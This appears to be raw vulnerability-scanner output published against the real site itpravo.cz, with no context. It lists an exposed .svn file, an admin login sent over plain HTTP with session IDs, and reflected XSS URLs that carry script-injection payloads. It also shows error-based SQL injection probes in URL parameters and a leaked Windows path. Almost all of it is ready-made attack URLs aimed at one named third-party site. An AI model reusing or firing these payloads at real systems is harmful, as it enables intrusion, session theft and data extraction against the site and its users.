itpravo.cz

1. *SVN Disclosure
2. URL: http://www.itpravo.cz/aaa/.svn/all-wcprops
3.  
4. *Password Transmitted Over HTTP
5. URL: http://www.itpravo.cz/aaa/admin/index.php3?AA_CP_Session=6dd9dad574ae71ea71bad185445c73d2
6. Form target action: /aaa/admin/index.php3?AA_CP_Session=6dd9dad574ae71ea71bad185445c73d2
7.  
8. *XSS
9. URL: http://www.itpravo.cz/fulltextdisc.shtml?AA_SL_Session=6d8f106740b7ce51e4b9757d038cadb3&nocache=invalidate&sh_itm='"--></style></script><script>alert(0x00031E)</script>&add_disc=1
10.  
11. URL: http://www.itpravo.cz/diskuze/index.shtml?AA_SL_Session=1669ce4329df803c425018873e69c502&nocache=invalidate&sh_itm='"--></style></script><script>alert(0x00046E)</script>&add_disc=1
12.  
13. URL: http://www.itpravo.cz/aaa/admin/index.php3?AA_CP_Session=6dd9dad574ae71ea71bad185445c73d2
14. Parameter Name: username
15. Parameter Type: Post
16. Attack Pattern: '"--></style></script><script>alert(0x0006BC)</script>
17.  
18. *Permanent XSS
19. URL : http://www.itpravo.cz/diskuze/index.shtml?AA_SL_Session=1669ce4329df803c425018873e69c502&nocache=(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))&sh_itm=78c4593979090b9c7fddc1f3e12f9ebc&add_disc=1
20.  
21. Injection URL: http://www.itpravo.cz/fulltextdisc.shtml?
22.  
23. *[Possible] Permanent Cross-site Scripting
24. http://www.itpravo.cz/diskuze/index.shtml?x=2016147&add_disc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&all_ids=Zobraz v?e&c_0=3&h_0=xcea526e78c88df65d2152898b9bc4a96&sel_ids=Zobraz vybrané
25.  
26. *[Possible] Internal Path Leakage (Windows)
27. C:\DOCUME~1\MARTIN~1\LOCALS~1\Temp\msohtmlclip1\01